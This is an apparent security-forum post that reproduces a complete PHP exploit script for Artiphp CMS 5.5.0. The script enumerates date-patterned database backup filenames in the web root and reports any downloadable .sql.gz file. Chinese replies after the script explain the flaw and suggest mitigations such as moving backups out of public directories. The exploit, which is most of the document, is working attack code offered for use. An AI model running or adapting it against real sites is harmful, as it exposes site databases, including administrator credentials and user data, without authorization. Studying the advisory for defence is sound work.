Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
<?php/*
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
Vendor: Artiphp
Product web page: http://www.ihonker.org
Affected version: 5.5.0 Neo (r422)
Summary: Artiphp is a content management system (CMS) open
and free to create and manage your website.
Desc: Artiphp stores database backups using backupDB() utility
with a predictable file name inside the web root, which can be
exploited to disclose sensitive information by downloading the
file. The backup is located in '/artzone/artpublic/database/'
directory as 'db_backup_..sql.gz' filename.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
PHP 5.3.8 / 5.3.9
MySQL 5.5.20
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2012-5091
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php
15.05.2012
*/
error_reporting(0);
print "\no==========================================================o\n";
print "| |";
print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit |\n";
print "| |\n";
print "|\t\t\tby LiquidWorm |\n";
print "| |";
print "\no==========================================================o\n";
if ($argc < 3)
{
print "\n\n\x20[*] Usage: php $argv <host> <port>\n\n\n";
die();
}
$godina_array = array('2012','2011','2010');
$mesec_array = array('12','11','10','09',
'08','07','06','05',
'04','03','02','01');
$dn_array = array('31','30','29','28','27','26',
'25','24','23','22','21','20',
'19','18','17','16','15','14',
'13','12','11','10','09','08',
'07','06','05','04','03','02',
'01');
$backup_array = array('full','structure','partial');
$host = $argv;
$port = intval($argv);
$path = "/artiphp/artzone/artpublic/database/"; // change per need.
$alert1 = "\033[0;31m";
$alert2 = "\033[0;37m";
foreach($godina_array as $godina)
{
print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: ";
sleep(2);
foreach($mesec_array as $mesec)
{
foreach($dn_array as $dn)
{
print "~";
foreach($backup_array as $backup)
{
if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz"))
{
print "\n\n\x20[!] DB backup file discovered!\n\n";
echo $alert1;
print "\x20==>\x20";
echo $alert2;
die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n");
}
}
}
}
}
print "\n\n\x20[*] Zero findings.\n\n\n"
?>
看不懂的路过 看不懂
Re: Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
这个漏洞挺典型的,Artiphp CMS 5.5.0 把数据库备份文件放在了 web 根目录下,而且文件名只按日期变化,攻击者靠遍历日期就能直接下载备份。备份里肯定包含管理员账号密码、用户数据等敏感信息,风险很高。 如果有人在用这个版本,建议尽快升级到不受影响的新版,或者修改 backupDB() 函数的备份路径和文件名规则,不要把备份放到可公开访问的目录里,最好再加上随机字符串或者访问权限验证。另外也可以考虑在服务器层面禁止直接访问 /artzone/artpublic/database/ 路径下的 .sql.gz 文件。Re: Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
谢谢分享,这个漏洞确实挺危险的。备份文件放在 web 根目录下,文件名还按日期规律生成,攻击者直接遍历就能下载数据库,等于把整个站点的数据拱手让人。建议使用这个 CMS 的用户尽快检查一下 `/artzone/artpublic/database/` 目录下是否有历史备份,同时升级到最新版本或者把备份目录移到 web 访问不到的路径下,并配合 `.htaccess` 限制访问。楼主有尝试复现成功吗?Re: Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
这是一个比较经典的CMS数据库备份泄露漏洞。Artiphp CMS 5.5.0版本在使用`backupDB()`备份数据库时,将备份文件直接存放在web根目录下,且文件名遵循固定的日期格式`db_backup_..sql.gz`,攻击者可以通过遍历日期组合轻易下载到数据库文件,导致敏感信息泄露。 这个漏洞的危害性在于不需要认证即可下载完整数据库,包括用户密码、配置信息等敏感数据。建议使用该CMS的站长尽快检查`/artzone/artpublic/database/`目录下是否存在此类备份文件,并考虑删除或将其移至web访问目录之外。同时也可以关注官方是否有新版本修复该问题。
页:
[1]